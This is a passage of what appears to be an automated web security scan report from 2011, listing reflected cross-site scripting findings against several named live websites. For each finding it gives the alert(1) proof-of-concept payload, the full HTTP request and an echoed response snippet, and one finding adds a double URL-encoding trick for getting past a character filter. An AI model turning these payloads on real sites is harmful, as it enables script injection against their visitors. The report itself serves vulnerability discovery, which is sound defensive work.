2.120. http:///MED336191486/direct/013813509777 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5761b'-alert(1)-'023a0ddd09d was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!5761b'-alert(1)-'023a0ddd09d HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:31 GMT
Connection: close
Content-Length: 9041

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!5761b'-alert(1)-'023a0ddd09d');
}
else
{
_strContentKRZ1315417255155 = '<a target="_blank" href="http://clk..com/go/336191486/direct;ai.235678306;ct.1/01/" onclick="if(\'http://adclick.g.doubleclick.net/aclk%253Fsa%25
...[SNIP]...

2.121. http:///MED336191486/direct/013813509777 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342f6"-alert(1)-"077d478a1ca was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!342f6"-alert(1)-"077d478a1ca HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:30 GMT
Connection: close
Content-Length: 9053

<html><head><title>KER.1003_oceanclubfall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!342f6"-alert(1)-"077d478a1ca",
clickThruUrl: "http://clk..com/go/336191486/direct;ai.235678280;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

2.122. http:///MED336191486/direct/013813509777 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d674c"><script>alert(1)</script>91b3f2b67de was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!d674c"><script>alert(1)</script>91b3f2b67de HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:29 GMT
Connection: close
Content-Length: 9123

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!d674c"><script>alert(1)</script>91b3f2b67de\')(new Image).src=\'http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0c
...[SNIP]...

2.123. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9331c'-alert(1)-'e0fa04f397 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&9331c'-alert(1)-'e0fa04f397=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:42 GMT
Connection: close
Content-Length: 9058

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&9331c'-alert(1)-'e0fa04f397=1');
}
else
{
_strContentKRZ1315417255155 = '<a target="_blank" href="http://clk..com/go/336191486/direct;ai.235678306;ct.1/01/" onclick="if(\'http://adclick.g.doubleclick.net/aclk%253Fsa%
...[SNIP]...

2.124. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b188f"><script>alert(1)</script>5d36b8efd09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&b188f"><script>alert(1)</script>5d36b8efd09=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:40 GMT
Connection: close
Content-Length: 9138

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&b188f"><script>alert(1)</script>5d36b8efd09=1\')(new Image).src=\'http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR
...[SNIP]...

2.125. http:///MED336191486/direct/013813509777 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78ac4"-alert(1)-"1497b455bec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&78ac4"-alert(1)-"1497b455bec=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:41 GMT
Connection: close
Content-Length: 9063

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=!&78ac4"-alert(1)-"1497b455bec=1",
clickThruUrl: "http://clk..com/go/336191486/direct;ai.235678306;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

2.126. https://www.4structures.com/4structures/front/search/main/searchProcess.jsp [queryString parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.4structures.com
Path:   /4structures/front/search/main/searchProcess.jsp

Issue detail

The value of the queryString request parameter is copied into the HTML document as plain text between tags. The payload 6885b<script>alert(1)</script>ce8934c5ca1aa82e4 was submitted in the queryString parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /4structures/front/search/main/searchProcess.jsp?fromDays=%7E&queryString=xss6885b<script>alert(1)</script>ce8934c5ca1aa82e4 HTTP/1.1
Host: www.4structures.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.4structures.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.4structures.com/4structures/process.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17AB0C0F6C69076E20E7C879B149E106; __utma=130301130.45741243.1317388778.1317388778.1317388778.1; __utmb=130301130.1.10.1317388778; __utmc=130301130; __utmz=130301130.1317388778.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:22:45 GMT
Server: Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m mod_jk/1.2.25
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 44669


<html>
<head>
<title>4Structures.com, LLC. - Our Services - structured settlements, qualified settlement fund, settlement preservation trust</title>
<meta na
...[SNIP]...
<b>Search Results for Query: xss6885b<script>alert(1)</script>ce8934c5ca1aa82e4 </b>
...[SNIP]...

2.127. http://www.allgetaways.com/travel-articles/articlePage.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allgetaways.com
Path:   /travel-articles/articlePage.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 155e1"-alert(1)-"c83b0571438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel-articles/articlePage.asp?155e1"-alert(1)-"c83b0571438=1 HTTP/1.1
Host: www.allgetaways.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 13:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8642
Content-Type: text/html
Expires: Fri, 30 Sep 2011 13:18:39 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

       <me
...[SNIP]...
<!--
               function addbookmark() {
               
                   var bookmarkurl="/travel-articles/articlePage.asp?155e1"-alert(1)-"c83b0571438=1";

                   bookmarktitle="Travels.com - Articles | Travels.com";
                   if (document.all)
                   window.external.AddFavorite(bookmarkurl,bookmarktitle);
               }
               
           -->
...[SNIP]...

2.128. http://www.barcelonapoint.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5114%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294b19faa30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5114"style="x:expression(alert(1))"94b19faa30c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?b5114%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294b19faa30c=1 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:13:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/?b5114"style="x:expression(alert(1))"94b19faa30c=1" target="_blank">
...[SNIP]...

2.129. http://www.barcelonapoint.com/apartment_results.php [&token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /apartment_results.php

Issue detail

The value of the &token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98659%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b5d6d43c62f was submitted in the &token parameter. This input was echoed as 98659"style="x:expression(alert(1))"b5d6d43c62f in the application's response.

